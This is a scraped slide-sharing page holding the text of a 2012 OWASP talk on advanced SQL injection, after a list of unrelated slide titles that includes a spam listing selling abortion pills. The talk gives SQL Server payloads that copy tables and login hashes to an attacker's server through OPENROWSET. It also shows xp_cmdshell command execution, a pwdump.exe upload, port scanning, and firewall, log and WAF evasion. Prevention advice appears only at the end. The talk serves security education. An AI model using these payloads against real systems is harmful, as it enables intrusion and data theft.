Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 

Dernier (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

Owasp Indy Q2 2012 Advanced SQLi

  • 1. Advanced SQLi and Evasion Techniques
  • 2. About Me Introduction Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP dprofancik@gmail.com @integrisec
  • 3. Credit Cesar Cerrudo – CTO, IOActive Labs o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injecti on.pdf ModSecurity Team – Trustwave SpiderLabs o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons- learned.html Avi Douglen – OWASP Board Member, Israel o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
  • 4. SQL Injection Basics • Dynamic construction of SQL queries “SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'” • Unsanitized user input uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd ='' • Excessive permission o Web services running as privileged user with db_owner rights o Connecting to database using sa, dbo, or sysadmin accounts o Lax file system permissions
  • 5.
  • 6.
  • 7.
  • 8.
  • 9. Advance SQLi Techniques • Blind SQL Injection • Data Exfiltration • Privilege Escalation • Command Execution • Uploading Files • Internal DB Server Exploration • Port Scanning • Firewall Evasion • Log Evasion • WAF Evasion
  • 11. Blind SQL Injection • Differential Analysis Example: http://www.someforum.com/posts.php?id=2 SELECT author, title, body FROM posts WHERE ID = 2 http://www.someforum.com/posts.php?id=2 and 1=2 SELECT author, title, body FROM posts WHERE ID = 2 and 1=2 http://www.someforum.com/posts.php?id=2 and 1=1 SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
  • 12. Blind SQL Injection (cont.) • Database Management System Fingerprinting o System Functions • MS SQL Server = getdate() • MySQL = now() • Oracle = sysdate() • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate() o String Concatenation • MS SQL Server = + • MySQL = +, CONCAT() • Oracle = ||, CONCAT() • Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st' o Query Chaining • MS SQL Server, MySQL = allows chaining with semicolon • Oracle = does NOT allow chaining with semicolon • Example: http://www.someforum.com/posts.php?id=2; commit --
  • 13. Blind SQL Injection (cont.) • Timing Attacks o Adding delay • SQL Server = WAIT FOR DELAY '0:0:10‘ • MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) • PostgreSQL = pg_sleep(10) • Oracle = Union with query that contains a lot of results o SELECT IF(condition, true, false) Example: …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
  • 15. Linked and Remote Servers • OPENROWSET Example: SELECT * FROM OPENROWSET( 'SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' 'SELECT * FROM table' ) • OPENDATASOURCE Example: SELECT * FROM OPENDATASOURCE( 'SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' ) .DatabaseName.dbo.TableName
  • 16. Data Exfiltration • Remote server INSERT Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM table2
  • 17. Data Exfiltration (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM master.dbo.sysdatabases INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysobjects ') SELECT * FROM databasename.dbo.sysobjects INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _syscolumns') SELECT * FROM databasename.dbo.syscolumns
  • 18. Data Exfiltration (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table1') SELECT * FROM databasename..table1 INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM table2') SELECT * FROM databasename..table2 INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', ‘SELECT * FROM _sysxlogins') SELECT * FROM databasename.dbo.sysxlogins
  • 19. Privilege Escalation • Known vulnerabilities Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt • Often not required o Connection strings using SA, dbo, sysadmin o Web service context
  • 20. Command Execution Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC master.dbo.xp_cmdshell 'dir'
  • 21. Uploading Files On attacker’s server… 1. CREATE TABLE AttackerTable (data text) 2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW') On victim’s server… 3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d' 4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftMSSQLServerClientConnectTo','AttackersAlias','REG_SZ' ,'DBMSSOCN,AttackersIP,80' 5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias - Usa -Ppwn3d'
  • 22. Uploading Files (cont.) INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM temp_table') EXEC xp_cmdshell '"first script line" >> script.vbs' … EXEC xp_cmdshell '"second script line" >> script.vbs' ... EXEC xp_cmdshell '"last script line" >> script.vbs' EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
  • 23. Internal DB Server Exploration • Linked and Remote Servers 1. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM master.dbo.sysservers 2. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysservers') SELECT * FROM linkedserver1.master.dbo.sysservers 3. INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', 'SELECT * FROM _sysdatabases') SELECT * FROM linkedserver1.master.dbo.sysdatabases 4. Rinse and repeat…
  • 24. Port Scanning Example: SELECT * FROM OPENROWSET('SQLOLEDB', 'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5', 'SELECT * FROM table')
  • 26. Firewall Evasion • Use port 80 for outbound Example: INSERT INTO OPENROWSET('SQLOLEDB', 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;', 'SELECT * FROM table1') SELECT * FROM table2
  • 27. Log Evasion • Inject using POST parameters • Long HTTP requests o IIS truncates requests longer than 4097 characters o Sun-One Application Server truncates at 4092 characters Example: http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
  • 28. WAF Evasion • Comments o # = single line comment o -- = single line comment o /* */ = inline, multi-line comment o /*! */ = MySQL-specific inline, multi-line comment Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM… • New line o %0D%0A = URL-encoded newline o %0B = URL-encoded vertical separator Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
  • 29. WAF Evasion (cont.) • Character Encoding o Unicode (U+02BC = ʼ) o CHAR() o Hexadecimal o URL-encoding o Double Encoding Example: Double Encoding: URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM… WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM… Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
  • 30. WAF Evasion (cont.) • Concatenation o EXEC() o Split/Join o Special Characters (i.e. ‘*‘, ‘+’, ‘%’, etc.) Example: Split/Join: URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users WAF = id=SELECT name id=password FROM users ASP/ASP.Net = id=SELECT name,password FROM users Special Characters: URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users WAF = id=SEL%ECT name,password FR%OM users ASP/ASP.Net = id=SELECT name,password FROM users
  • 31.
  • 33. SQLi Prevention • Sanitize User Input o Normalize Input o Whitelists o Built-in Functions o Regular Expressions o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.) • Prepared Statements/Parameterized Queries • Stored Procedures • Accounts with Least Privilege • Enable DisallowAdhocAccess registry setting for MS SQL Server • Perform Self Assessments • Use a Web Application Firewall • Filter Outbound Traffic at Firewall
  • 34. Q&A